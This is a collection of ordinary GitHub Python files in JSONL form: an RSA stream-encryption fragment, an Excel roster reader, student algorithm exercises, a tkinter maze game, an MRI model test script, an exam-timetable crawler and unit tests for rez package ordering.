bits_max = n.bit_length()\n q, r = divmod(bits_max - 1, 8)\n bytes_max = q if q > 0 else q + 1\n getrandbits = random.getrandbits\n\n def mkprefix(x):\n return bytes(encode(getrandbits(random.randrange(32, 48)))) + bytes(encode(x))\n\n i = 0\n prefix = mkprefix(i)\n block = src.read(bytes_max - len(prefix))\n while block:\n cypher = encrypt(prefix + block, n, e)\n # print('E', i, len(cypher), file=stderr)\n encode_stream(out, len(cypher))\n out.write(cypher)\n # print('blob', blob)\n i += 1\n prefix = mkprefix(i)\n block = src.read(bytes_max - len(prefix))\n\n\ndef vdecrypt(n, d, src, out, i=0):\n from .varint import decode_stream\n from io import BytesIO\n\n s = decode_stream(src)\n while s > 0:\n cypher = src.read(s)\n blob = decrypt(cypher, n, d)\n # print('D', i, s, len(blob))\n b = BytesIO(blob)\n salt = decode_stream(b)\n index = decode_stream(b)\n block = b.read()\n # print(n, index, salt, blob)\n assert index == i\n assert salt != 0\n out.write(block)\n i += 1\n s = decode_stream(src)\n","repo_name":"biojet1/mendec","sub_path":"mendec/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6923922189","text":"import xlrd\nimport datetime\nfrom matplotlib import pyplot as plt\n\n\nclass Rosters:\n def __init__(self, filename) -> None:\n workbook = xlrd.open_workbook(filename)\n self.worksheet = workbook.sheet_by_index(0)\n\n def print(self, row_offset, col_offset):\n col_offset = col_offset * 5\n row_offset = 6 + row_offset * 4 + row_offset * 25\n for row in range(row_offset, row_offset+25):\n for col in range(col_offset, col_offset+4):\n # Print the cell values with tab space\n print(self.worksheet.cell_value(row, col), end='\\t')\n print('')\n\n def list(self, row_offset, col_offset):\n roster = []\n\n col_offset = col_offset * 5\n row_offset = 6 + row_offset * 4 + row_offset * 25\n for row in range(row_offset, row_offset+25):\n roster.append({\n 'Created': datetime.datetime.now(),\n 'Role': self.worksheet.cell_value(row, col_offset+0),\n 'Name': self.worksheet.cell_value(row, col_offset+1),\n 'Team': self.worksheet.cell_value(row, col_offset+2),\n 'Cost': self.worksheet.cell_value(row, col_offset+3)\n })\n return roster","repo_name":"andregri/fantablog","sub_path":"python/rose/roster.py","file_name":"roster.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24296800465","text":"# python3\n\nfrom collections import namedtuple\n\nRequest = namedtuple(\"Request\", [\"arrived_at\", \"time_to_process\"])\nResponse = namedtuple(\"Response\", [\"was_dropped\", \"started_at\"])\n\n\nclass Buffer:\n def __init__(self, size):\n self.size = size\n self.finish_time = []\n\n def process(self, request):\n start = request[0]\n if not self.finish_time:\n self.finish_time.append(request[1])\n return Response(False, start)\n if start + self.size > self.finish_time[-1]:\n self.finish_time.append(request[1])\n return Response(False, sum(self.finish_time[:-1]))\n return Response(False, -1)\n\n\ndef process_requests(requests, buffer):\n responses = []\n for request in requests:\n responses.append(buffer.process(request))\n return responses\n\n\ndef main():\n f = open(\"tests/18\", \"r\")\n buffer_size, n_requests = map(int, f.readline().split())\n # buffer_size, n_requests = map(int, input().split())\n requests = []\n for _ in range(n_requests):\n arrived_at, time_to_process = map(int, f.readline().split())\n # arrived_at, time_to_process = map(int, input().split())\n requests.append(Request(arrived_at, time_to_process))\n\n buffer = Buffer(buffer_size)\n responses = process_requests(requests, buffer)\n\n for response in responses:\n print(response.started_at if not response.was_dropped else -1)\n\n\nmain()\n# if __name__ == \"__main__\":\n# main()\n\n# Input_file = open(\"tests/03\", \"r\")\n# for n in Input_file:\n# main()\n\n\n# print __name__\n","repo_name":"qmcgilvery/Dashboard","sub_path":"USD/Data Structures/week1_basic_data_structures/3_network_simulation/process_packages.py","file_name":"process_packages.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"4169709364","text":"import tkinter as tk\nimport maze_maker as mm\nimport random\n\ndef key_down(event):\n global key\n key = event.keysym\n #print(f\"{key}キーが押されました\")\n\ndef key_up(event):\n global key\n key = \"\"\n\ndef main_proc():\n global cx, cy, mx, my\n\n d = { # キー:押されているキーkey/値: 移動幅リスト[x,y]\n \"Up\":[0, -1],\n \"Down\": [0, +1],\n \"Left\": [-1, 0],\n \"Right\": [+1, 0],\n }\n \n try:\n if maze_bg[ my+d[key][1]][mx+d[key][0]] == 0: # もし移動先が床ならば\n my, mx = my+d[key][1], mx+d[key][0]\n except:\n pass\n\n\n cx, cy = mx*100+50, my*100+50\n canvas.coords(\"tori\", cx, cy)\n root.after(100, main_proc)\n\ndef add_enemy(): #teki1をランダムに出力\n global cx, cy, dx, dy, teki\n teki1 = tk.PhotoImage(file=\"fig/43012274426004b86abe4d47172c8ee8.png\")\n dx = random.randint(0, 13)\n dy = random.randint(0, 13)\n cx, cy = 100*dx, 100*dy\n canvas.create_image(cx, cy, image=teki, tag=\"teki1\")\n canvas.coords(\"teki1\", cx, cy)\n root.after(200, add_enemy)\n\nif __name__ == \"__main__\":\n global key\n root = tk.Tk()\n root.title(\"pakupakumeiro\")\n \n canvas = tk.Canvas(root, width=1500, height=900, bg=\"black\")\n canvas.pack()\n\n maze_bg = mm.make_maze(15, 9) # 1:壁 0:床 を表す二次元リスト\n #print(maze_bg)\n mm.show_maze(canvas, maze_bg)# \n\n pakuman = tk.PhotoImage(file=\"fig/b312acaa0397b6d20574f475e35f5ffc.png\")\n pakuman = pakuman.zoom(5)\n pakuman = pakuman.subsample(32)\n mx, my = 1, 1\n cx, cy = mx*100+50, my*100+50\n #cx, cy = 300, 400\n canvas.create_image(cx, cy, image=pakuman, tag=\"tori\")\n\n dx = random.randint(0, 13)\n dy = random.randint(0, 13)\n teki = tk.PhotoImage(file=\"fig/43012274426004b86abe4d47172c8ee8.png\")\n teki = teki.zoom(5)\n teki = teki.subsample(32)\n cx, cy = 100*dx, 100*dy\n canvas.create_image(cx, cy, image = teki, tag=\"teki1\")\n\n key = \"\"\n\n root.bind(\"\", key_down)\n root.bind(\"\", key_up)\n\n root.after(0, main_proc)\n root.after(0, add_enemy)\n\n #main_proc()\n\n \n root.mainloop()","repo_name":"c0a2110686/ProjExD","sub_path":"ex03/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"14021379584","text":"import time\r\nfrom utils import *\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\r\n#from utils_kdata import *\r\nfrom KI_DENSE import *\r\nimport tensorflow as tf\r\nimport matplotlib.image as mpimg\r\nimport numpy as np\r\nimport os\r\nimport datetime\r\n# Configs\r\nprint('[*] run basic configs ... ')\r\nsave_path = r'' #保存模型路径\r\nsave_path = os.path.join(save_path, '20230512-1757')\r\ncheckpoint_dir = os.path.join(save_path, \"best_checkpoint\")\r\ntestdata_path = r'' #测试集数据路径\r\nBATCH_SIZE = 16\r\ntest_results_path = os.path.join(save_path, 'result')\r\ntry:\r\n os.mkdir(test_results_path)\r\nexcept FileExistsError:\r\n pass\r\n\r\n# Input Pipeline\r\nprint('[*] load data ... ')\r\nlabels_test, sparses_test,mask = data_process2(testdata_path)\r\ntest_dataset = tf.data.Dataset.from_tensor_slices((sparses_test[:128], labels_test[:128]))\r\ntest_dataset = test_dataset.batch(BATCH_SIZE)\r\n\r\nmask = tf.cast(mask, tf.complex64)\r\n\r\n# Build the Generator\r\nprint('[*] define model ... ')\r\nslices, nw, nh, nz = sparses_test.shape\r\ngenerator = getModel(nw, nh, nz)\r\nslices = 128\r\n# Define Optimizer\r\ngenerator_optimizer = tf.keras.optimizers.Adam(0.5)\r\n\r\n# Checkpoints (Object-based saving)\r\ncheckpoint = tf.train.Checkpoint(optimizer=generator_optimizer,\r\n model=generator)\r\nckpt_manager = tf.train.CheckpointManager(checkpoint, checkpoint_dir, max_to_keep=5)\r\n\r\nstart_epoch = 0\r\nif ckpt_manager.latest_checkpoint:\r\n start_epoch = int(ckpt_manager.checkpoints[-1].split('-')[-1])\r\n checkpoint.restore(ckpt_manager.checkpoints[-1])\r\n print('[**] Latest checkpoint: {0} restored!'.format(start_epoch))\r\nphase = 96\r\n# Evaluate\r\nsteps = slices//BATCH_SIZE\r\ncnn1 = np.zeros([steps, BATCH_SIZE, 96, phase, 2])\r\ngt1 = np.zeros([steps, BATCH_SIZE, 96, phase, 1])\r\nzf1 = np.zeros([steps, BATCH_SIZE, 96, phase, 2])\r\nnum = 0\r\nstep = 0\r\nZF_PATH, CNN_PATH, GT_PATH, CONCAT_PATH, Metrics_PATH = make_results_dir(test_results_path)\r\n\r\nfor inp, tar in test_dataset:\r\n step += 1\r\n mask2 = tf.expand_dims(mask, 0)\r\n mask2 = tf.tile(mask2, [inp.get_shape()[0], 1, 1, 1])\r\n mask2 = tf.reshape(mask2, mask2.get_shape()[:3])\r\n prediction,K = generator([inp, mask2])\r\n cnn1[step-1] = prediction\r\n gt1[step-1] = tf.abs(tar)\r\n zf1[step-1] = inp\r\n max_samples = tf.shape(inp)[0]\r\n image = tf.concat(axis=2, values=[tf.abs(tar), c2r(inp), c2r(prediction)])\r\n image = image[0:max_samples, :, :]\r\n image = tf.concat(axis=0, values=[image[i] for i in range(max_samples)])\r\n mpimg.imsave(os.path.join(CONCAT_PATH, '{:03d}.tif'.format(step)), tf.squeeze(image), cmap='gray')\r\n\r\n for i in range(max_samples):\r\n num += 1\r\n inp1=c2r(inp)\r\n prediction1=c2r(prediction)\r\n tar = tf.abs(tar)\r\n mpimg.imsave(os.path.join(ZF_PATH, '{:03d}.tif'.format(num)), inp1[i, :, :, 0], cmap='gray')\r\n mpimg.imsave(os.path.join(GT_PATH, '{:03d}.tif'.format(num)), tar[i, :, :, 0], cmap='gray')\r\n mpimg.imsave(os.path.join(CNN_PATH, '{:03d}.tif'.format(num)), prediction1[i, :, :, 0], cmap='gray')\r\n\r\n\r\ncnn1 = np.reshape(cnn1, [-1, phase, phase, 2])\r\ngt1 = np.reshape(gt1, [-1, phase, phase, 1])\r\nzf1 = np.reshape(zf1, [-1, phase, phase, 2])\r\nscipy.io.savemat(Metrics_PATH, {'cnn1': cnn1, 'gt1': gt1, 'zf1': zf1})\r\n\r\nprint(\"[**] Test Completed\")\r\n\r\n","repo_name":"zimli/EN2-convolution-network","sub_path":"test_KI.py","file_name":"test_KI.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9235452636","text":"from cqupt.urls import URL_TASKS\nfrom cqupt.log import loading\nfrom prettytable import PrettyTable\nfrom bs4 import BeautifulSoup\n\n\nclass Task:\n task: list = []\n\n @classmethod\n @loading('正在获取考试安排')\n def crawl(cls, request):\n soup = BeautifulSoup(request.get(URL_TASKS).text, 'html.parser')\n for tr in soup.find('tbody').findAll('tr'):\n tds = tr.findAll('td')[5:]\n cls.task.append([\n tds[0].text, # 课程名称\n tds[4].text, # 教室号\n tds[5].text, # 座位号\n tds[1].text, # 周次\n tds[2].text, # 星期\n tds[3].text, # 具体时间\n tds[6].text # 资格\n ])\n\n @classmethod\n def handle(cls, request, arg):\n cls.crawl(request)\n row = None\n table = PrettyTable(['课程名称', '教室', '座位', '周次', '星期', '具体时间', '资格'])\n if cls.task:\n for row in cls.task:\n table.add_row(row)\n if cls.task:\n print('\\n共', len(cls.task), '项考试')\n print(table)\n print('多喝热水, 及时做好复习准备哦~')\n else:\n print('\\n无查询结果!')","repo_name":"mivinci/cqupt-piper","sub_path":"cqupt/crawlers/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"43884315054","text":"import json\n\nfrom rez.config import config\nfrom rez.package_order import NullPackageOrder, PackageOrder, PerFamilyOrder, VersionSplitPackageOrder, \\\n TimestampPackageOrder, SortedOrder, PackageOrderList, from_pod\nfrom rez.packages import iter_packages\nfrom rez.tests.util import TestBase, TempdirMixin\nfrom rez.version import Version\n\n\nclass _BaseTestPackagesOrder(TestBase, TempdirMixin):\n \"\"\"Base class for a package ordering test case\"\"\"\n @classmethod\n def setUpClass(cls):\n TempdirMixin.setUpClass()\n\n cls.py_packages_path = cls.data_path(\"packages\", \"py_packages\")\n cls.solver_packages_path = cls.data_path(\"solver\", \"packages\")\n\n cls.settings = dict(\n packages_path=[\n cls.solver_packages_path,\n cls.py_packages_path\n ],\n package_filter=None)\n\n @classmethod\n def tearDownClass(cls):\n TempdirMixin.tearDownClass()\n\n def _test_reorder(self, orderer, package_name, expected_order):\n \"\"\"Ensure ordered order package version as expected.\"\"\"\n it = iter_packages(package_name)\n descending = sorted(it, key=lambda x: x.version, reverse=True)\n ordered = orderer.reorder(descending) or descending\n result = [str(x.version) for x in ordered]\n self.assertEqual(expected_order, result)\n\n def _test_pod(self, orderer):\n \"\"\"Ensure an orderer integrity when serialized to pod.\"\"\"\n pod = json.loads(json.dumps(orderer.to_pod())) # roundtrip to JSON\n actual = orderer.__class__.from_pod(pod)\n self.assertEqual(orderer, actual)\n\n\nclass TestAbstractPackageOrder(TestBase):\n \"\"\"Test case for the abstract PackageOrder class\"\"\"\n\n def test_reorder(self):\n \"\"\"Validate reorder is not implemented\"\"\"\n with self.assertRaises(NotImplementedError):\n PackageOrder().reorder([])\n\n def test_to_pod(self):\n \"\"\"Validate to_pod is not implemented\"\"\"\n self.assertRaises(NotImplementedError, PackageOrder().to_pod)\n\n def test_str(self):\n \"\"\"Validate __str__ is not implemented\"\"\"\n with self.assertRaises(NotImplementedError):\n str(PackageOrder())\n\n def test_eq(self):\n \"\"\"Validate __eq__ is not implemented\"\"\"\n with self.assertRaises(NotImplementedError):\n PackageOrder() == PackageOrder()\n\n\nclass TestNullPackageOrder(_BaseTestPackagesOrder):\n \"\"\"Test case for the NullPackageOrder class\"\"\"\n\n def test_repr(self):\n \"\"\"Validate we can represent a VersionSplitPackageOrder as a string.\"\"\"\n self.assertEqual(\"NullPackageOrder({})\", repr(NullPackageOrder()))\n\n def test_comparison(self):\n \"\"\"Validate we can compare VersionSplitPackageOrder together.\"\"\"\n inst1 = NullPackageOrder()\n inst2 = NullPackageOrder()\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == \"wrong_type\") # __eq__ negative (wrong type)\n self.assertTrue(inst1 != \"wrong_type\") # __ne__ positive (wrong type)\n self.assertFalse(inst1 != inst2) # __ne__ negative\n\n def test_pod(self):\n \"\"\"Validate we can save and load a VersionSplitPackageOrder to it's pod representation.\"\"\"\n self._test_pod(NullPackageOrder())\n\n def test_sha1(self):\n \"\"\"Validate we can get a sha1 hash.\n \"\"\"\n self.assertEqual(\n 'bf7c2fa4e6bd198c02adeea2c3a382cf57242051', NullPackageOrder().sha1\n )\n\n\nclass TestSortedOrder(_BaseTestPackagesOrder):\n \"\"\"Test case for the SortedOrder class\"\"\"\n\n def test_reorder_ascending(self):\n \"\"\"Validate we can sort packages in ascending order.\"\"\"\n self._test_reorder(SortedOrder(descending=False), \"pymum\", [\"1\", \"2\", \"3\"])\n\n def test_reorder_descending(self):\n \"\"\"Validate we can sort packages in descending order.\"\"\"\n self._test_reorder(SortedOrder(descending=True), \"pymum\", [\"3\", \"2\", \"1\"])\n\n def test_comparison(self):\n \"\"\"Validate we can compare SortedOrder together.\"\"\"\n inst1 = SortedOrder(descending=False)\n inst2 = SortedOrder(descending=False)\n inst3 = SortedOrder(descending=True)\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == inst3) # __eq__ negative\n self.assertTrue(inst1 != inst3) # __ne__ positive\n self.assertFalse(inst1 != inst2) # __ne__ negative\n self.assertFalse(inst1 == \"wrong_type\") # __eq__ negative (wrong type)\n self.assertTrue(inst1 != \"wrong_type\") # __eq__ negative (wrong type)\n\n def test_repr(self):\n \"\"\"Validate we can represent a SortedOrder as a string.\"\"\"\n self.assertEqual(\"SortedOrder(True)\", repr(SortedOrder(descending=True)))\n\n def test_pod(self):\n \"\"\"Validate we can save and load a SortedOrder to it's pod representation.\"\"\"\n self._test_pod(SortedOrder(descending=True))\n\n\nclass TestPerFamilyOrder(_BaseTestPackagesOrder):\n \"\"\"Test case for the PerFamilyOrder class\"\"\"\n\n def test_reorder(self):\n \"\"\"Test ordering.\"\"\"\n expected_null_result = [\"7\", \"6\", \"5\"]\n expected_split_result = [\"2.6.0\", \"2.5.2\", \"2.7.0\", \"2.6.8\"]\n expected_timestamp_result = [\"1.1.1\", \"1.1.0\", \"1.0.6\", \"1.0.5\", \"1.2.0\", \"2.0.0\", \"2.1.5\", \"2.1.0\"]\n\n orderer = PerFamilyOrder(\n order_dict=dict(\n pysplit=NullPackageOrder(),\n python=VersionSplitPackageOrder(Version(\"2.6.0\")),\n timestamped=TimestampPackageOrder(timestamp=3001, rank=3)\n ),\n default_order=SortedOrder(descending=False)\n )\n\n self._test_reorder(orderer, \"pysplit\", expected_null_result)\n self._test_reorder(orderer, \"python\", expected_split_result)\n self._test_reorder(orderer, \"timestamped\", expected_timestamp_result)\n self._test_reorder(orderer, \"pymum\", [\"1\", \"2\", \"3\"])\n\n def test_reorder_no_packages(self):\n \"\"\"Validate ordering for a family with no packages.\"\"\"\n orderer = PerFamilyOrder(order_dict=dict(missing_package=NullPackageOrder()))\n self._test_reorder(orderer, \"missing_package\", [])\n\n def test_reorder_no_default_order(self):\n \"\"\"Test behavior when there's no secondary default_order.\"\"\"\n fam_orderer = PerFamilyOrder(order_dict={})\n self._test_reorder(fam_orderer, \"pymum\", [\"3\", \"2\", \"1\"])\n\n def test_comparison(self):\n \"\"\"Validate we can compare PerFamilyOrder.\"\"\"\n inst1 = PerFamilyOrder(order_dict={'foo': NullPackageOrder()}, default_order=NullPackageOrder())\n inst2 = PerFamilyOrder(order_dict={'foo': NullPackageOrder()}, default_order=NullPackageOrder())\n inst3 = PerFamilyOrder(order_dict={'bar': NullPackageOrder()}, default_order=NullPackageOrder())\n inst4 = PerFamilyOrder(order_dict={'foo': NullPackageOrder()}, default_order=None)\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == inst3) # __eq__ negative (different order dict)\n self.assertFalse(inst1 == inst4) # __eq__ negative (different default_order)\n self.assertTrue(inst1 != inst3) # __ne__ positive (different order dict)\n self.assertTrue(inst1 != inst4) # __ne__ positive (different default order)\n self.assertFalse(inst1 != inst2) # __ne__ negative\n\n def test_repr(self):\n \"\"\"Validate we can represent a PerFamilyOrder as a string.\"\"\"\n inst = PerFamilyOrder(order_dict={\"family1\": VersionSplitPackageOrder(Version(\"2.6.0\"))})\n self.assertEqual(\"PerFamilyOrder(([('family1', '2.6.0')], 'None'))\", repr(inst))\n\n def test_pod(self):\n \"\"\"Validate we can save and load a PerFamilyOrder to it's pod representation.\"\"\"\n self._test_pod(\n PerFamilyOrder(order_dict={'foo': NullPackageOrder()}, default_order=NullPackageOrder())\n )\n\n # No default_order\n self._test_pod(\n PerFamilyOrder(order_dict={'foo': NullPackageOrder()})\n )\n\n\nclass TestVersionSplitPackageOrder(_BaseTestPackagesOrder):\n \"\"\"Test case for the VersionSplitPackageOrder class\"\"\"\n\n def test_reordere(self):\n \"\"\"Validate package ordering with a VersionSplitPackageOrder\"\"\"\n orderer = VersionSplitPackageOrder(Version(\"2.6.0\"))\n expected = [\"2.6.0\", \"2.5.2\", \"2.7.0\", \"2.6.8\"]\n self._test_reorder(orderer, \"python\", expected)\n\n def test_comparison(self):\n \"\"\"Validate we can compare VersionSplitPackageOrder together.\"\"\"\n inst1 = VersionSplitPackageOrder(first_version=Version(\"1.2.3\"))\n inst2 = VersionSplitPackageOrder(first_version=Version(\"1.2.3\"))\n inst3 = VersionSplitPackageOrder(first_version=Version(\"1.2.4\"))\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == inst3) # __eq__ negative\n self.assertTrue(inst1 != inst3) # __ne__ positive\n self.assertFalse(inst1 != inst2) # __ne__ negative\n self.assertFalse(inst1 == \"wrong_type\") # __eq__ negative (wrong type)\n self.assertTrue(inst1 != \"wrong_type\") # __eq__ negative (wrong type)\n\n def test_repr(self):\n \"\"\"Validate we can represent a VersionSplitPackageOrder as a string.\"\"\"\n inst = VersionSplitPackageOrder(first_version=Version(\"1,2,3\"))\n self.assertEqual(\"VersionSplitPackageOrder(1,2,3)\", repr(inst))\n\n def test_pod(self):\n \"\"\"Validate we can save and load a VersionSplitPackageOrder to it's pod representation.\"\"\"\n self._test_pod(VersionSplitPackageOrder(first_version=Version(\"1.2.3\")))\n\n\nclass TestTimestampPackageOrder(_BaseTestPackagesOrder):\n \"\"\"Test cases for the TimestampPackageOrder class\"\"\"\n\n def test_reorder_no_rank(self):\n \"\"\"Validate reordering with a rank of 0.\"\"\"\n orderer = TimestampPackageOrder(timestamp=3001)\n expected = ['1.1.0', '1.0.6', '1.0.5', '1.1.1', '1.2.0', '2.0.0', '2.1.0', '2.1.5']\n self._test_reorder(orderer, \"timestamped\", expected)\n\n def test_reorder_rank_3(self):\n \"\"\"Validate reordering with a rank of 3.\"\"\"\n # after v1.1.0 and before v1.1.1\n orderer1 = TimestampPackageOrder(timestamp=3001, rank=3)\n expected1 = [\"1.1.1\", \"1.1.0\", \"1.0.6\", \"1.0.5\", \"1.2.0\", \"2.0.0\", \"2.1.5\", \"2.1.0\"]\n self._test_reorder(orderer1, \"timestamped\", expected1)\n\n # after v2.1.0 and before v2.1.5\n orderer2 = TimestampPackageOrder(timestamp=7001, rank=3)\n expected2 = [\"2.1.5\", \"2.1.0\", \"2.0.0\", \"1.2.0\", \"1.1.1\", \"1.1.0\", \"1.0.6\", \"1.0.5\"]\n self._test_reorder(orderer2, \"timestamped\", expected2)\n\n def test_reorder_rank_2(self):\n \"\"\"Add coverage for a corner case where there's only one candidate without the rank.\"\"\"\n orderer = TimestampPackageOrder(timestamp=4001, rank=3) # 1.1.1\n expected = ['1.1.1', '1.1.0', '1.0.6', '1.0.5', '1.2.0', '2.0.0', '2.1.5', '2.1.0']\n self._test_reorder(orderer, \"timestamped\", expected)\n\n def test_reorder_packages_without_timestamps(self):\n \"\"\"Validate reordering of packages that have no timestamp data.\"\"\"\n orderer = TimestampPackageOrder(timestamp=3001)\n self._test_reorder(orderer, \"pymum\", [\"3\", \"2\", \"1\"])\n\n def test_reorder_all_packages_before_timestamp(self):\n \"\"\"Test behavior when all packages are before the timestamp.\"\"\"\n timestamp_orderer = TimestampPackageOrder(timestamp=9999999999, rank=3)\n expected = ['2.1.5', '2.1.0', '2.0.0', '1.2.0', '1.1.1', '1.1.0', '1.0.6', '1.0.5']\n self._test_reorder(timestamp_orderer, \"timestamped\", expected)\n\n def test_reorder_all_packages_after_timestamp(self):\n \"\"\"Test behavior when all packages are after the timestamp.\"\"\"\n timestamp_orderer = TimestampPackageOrder(timestamp=0, rank=3)\n expected = ['1.0.6', '1.0.5', '1.1.1', '1.1.0', '1.2.0', '2.0.0', '2.1.5', '2.1.0']\n self._test_reorder(timestamp_orderer, \"timestamped\", expected)\n\n def test_comparison(self):\n \"\"\"Validate we can compare TimestampPackageOrder.\"\"\"\n inst1 = TimestampPackageOrder(timestamp=1, rank=1)\n inst2 = TimestampPackageOrder(timestamp=1, rank=1)\n inst3 = TimestampPackageOrder(timestamp=2, rank=1)\n inst4 = TimestampPackageOrder(timestamp=2, rank=2)\n self.assertTrue(inst1 == inst2) # __eq__ positive\n self.assertFalse(inst1 == inst3) # __eq__ negative (different timestamp)\n self.assertFalse(inst1 == inst4) # __eq__ negative (different rank)\n self.assertTrue(inst1 != inst3) # __ne__ positive (different timestamp)\n self.assertTrue(inst1 != inst4) # __ne__ positive (different rank)\n self.assertFalse(inst1 != inst2) # __ne__ negative\n\n def test_repr(self):\n \"\"\"Validate we can represent a TimestampPackageOrder as a string.\"\"\"\n inst = TimestampPackageOrder(timestamp=1, rank=2)\n self.assertEqual(repr(inst), \"TimestampPackageOrder((1, 2))\")\n\n def test_pod(self):\n \"\"\"Validate we can save and load a TimestampPackageOrder to pod representation.\"\"\"\n self._test_pod(TimestampPackageOrder(timestamp=3001, rank=3))\n\n\nclass TestPackageOrdererList(_BaseTestPackagesOrder):\n \"\"\"Test cases for the PackageOrderList class.\"\"\"\n\n def test_singleton(self):\n \"\"\"Validate we can build a PackageOrderList object from configuration values.\"\"\"\n config.override(\"package_orderers\", [\n {\n \"type\": \"per_family\",\n \"orderers\": [\n {\n \"packages\": [\"python\"],\n \"type\": \"version_split\",\n \"first_version\": \"2.9.9\"\n }\n ]\n }\n ])\n expected = PackageOrderList()\n expected.append(PerFamilyOrder(order_dict={\n \"python\": VersionSplitPackageOrder(Version(\"2.9.9\"))\n }))\n\n # Clear @classproperty cache\n try:\n delattr(PackageOrderList, '_class_property_singleton')\n except AttributeError:\n pass\n self.assertEqual(expected, PackageOrderList.singleton)\n\n def test_singleton_novalue(self):\n \"\"\"Validate we can build a PackageOrderList object from empty configuration values.\"\"\"\n config.override(\"package_orderers\", None)\n\n # Clear @classproperty cache\n try:\n delattr(PackageOrderList, '_class_property_singleton')\n except AttributeError:\n pass\n\n self.assertEqual(PackageOrderList(), PackageOrderList.singleton)\n\n def test_pod(self):\n \"\"\"Validate we can save and load a PackageOrdererList to pod representation.\"\"\"\n inst = PackageOrderList((\n VersionSplitPackageOrder(Version(\"2.6.0\")),\n PerFamilyOrder(order_dict={}, default_order=SortedOrder(descending=False))\n ))\n self._test_pod(inst)\n\n\nclass TestPackageOrderPublic(TestBase):\n \"\"\"Additional tests for public symbols in package_order.py\"\"\"\n\n def test_from_pod_old_style(self):\n \"\"\"Validate from_pod is still compatible with the older pod style.\"\"\"\n self.assertEqual(\n VersionSplitPackageOrder(first_version=Version(\"1.2.3\")),\n from_pod((\"version_split\", {\"first_version\": \"1.2.3\"}))\n )\n","repo_name":"AcademySoftwareFoundation/rez","sub_path":"src/rez/tests/test_packages_order.py","file_name":"test_packages_order.py","file_ext":"py","file_size_in_byte":15244,"program_lang":"python","lang":"en","doc_type":"code","stars":844,"dataset":"github-code","pt":"79"} +{"seq_id":"23868616857","text":"#bfs\n\nfrom collections import deque\n\n\nn, m = map(int, input().split())\ngraph= []\nfor i in range(n):\n graph.append(list(map(int, list(input().strip()))))\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, -1, 1]\n\ndef bfs():\n answer = deque()\n answer.append([0, 0, 1])\n visit = [[[0] * 2 for i in range(m)] for i in range(n)]\n visit[0][0][1] = 1\n while answer:\n a, b, w = answer.popleft()\n if a == n - 1 and b == m - 1:\n return visit[a][b][w]\n for i in range(4):\n x = a + dx[i]\n y = b + dy[i]\n if 0 <= x < n and 0 <= y < m:\n if graph[x][y] == 1 and w == 1:\n visit[x][y][0] = visit[a][b][1] + 1\n answer.append([x, y, 0])\n elif graph[x][y] == 0 and visit[x][y][w] == 0:\n visit[x][y][w] = visit[a][b][w] + 1\n answer.append([x, y, w])\n return -1\n\nprint(bfs())","repo_name":"me4n-lee/ALGORITHM_2022-2nd","sub_path":"albun/과제/hw4_2016251040_이민혁/hw4_2.py","file_name":"hw4_2.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6213439484","text":"ROOT_PATH = \"/\"\nSEPARATOR = \"/\"\n\n\ndef format_path(current_path, path, default=None):\n if path:\n path = path.strip()\n\n if not path:\n return default if default else current_path\n\n absolute = path.startswith(ROOT_PATH)\n if not absolute:\n path = SEPARATOR.join((current_path, path))\n\n parts = split_path(path)\n\n result = []\n for part in parts:\n if part == \".\":\n continue\n elif part == \"..\":\n # Up one level\n result = result[:-1]\n else:\n result.append(part)\n\n new_path = ROOT_PATH + SEPARATOR.join(result)\n\n return new_path\n\n\ndef split_path(path):\n if not path:\n return []\n\n return [part for part in path.strip().split(SEPARATOR)\n if part]","repo_name":"m110/climb","sub_path":"climb/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14595713418","text":"#Given two arrays, write a function to compute their intersection.\n\nclass Solution(object):\n def MergeSort(self, nums):\n\n current_size = 1\n length_of_nums = len(nums) - 1\n while current_size < length_of_nums:\n left = 0\n while left < length_of_nums:\n mid = min((left+current_size-1), length_of_nums)\n high = min((left + 2*current_size - 1), length_of_nums)\n self.merge(nums, left, mid, high)\n left = left + 2*current_size\n current_size = 2 * current_size\n\n\n def merge(self, nums, low, mid, high):\n left_array = nums[low:mid+1]\n right_array = nums[mid+1:high+1]\n\n left = 0\n right = 0\n counter = low\n\n # Copy smaller element from left array or right array\n while left < len(left_array) and right < len(right_array):\n if left_array[left] <= right_array[right]:\n nums[counter] = left_array[left]\n left += 1\n else:\n nums[counter] = right_array[right]\n right += 1\n counter += 1\n\n #Copy remaining elements of left array\n while left < len(left_array):\n nums[counter] = left_array[left]\n counter += 1\n left += 1\n\n # Copy remaining elements of right array\n while right < len(right_array):\n nums[counter] = right_array[right]\n counter += 1\n right += 1\n\n\nmy_sol = Solution()\n\nnums = [4,2, 3, 1]\nmy_sol.MergeSort(nums)\nprint(nums) #[1,2,3,4]\n\nnums = [1,2,3,4]\nmy_sol.MergeSort(nums)\nprint(nums) 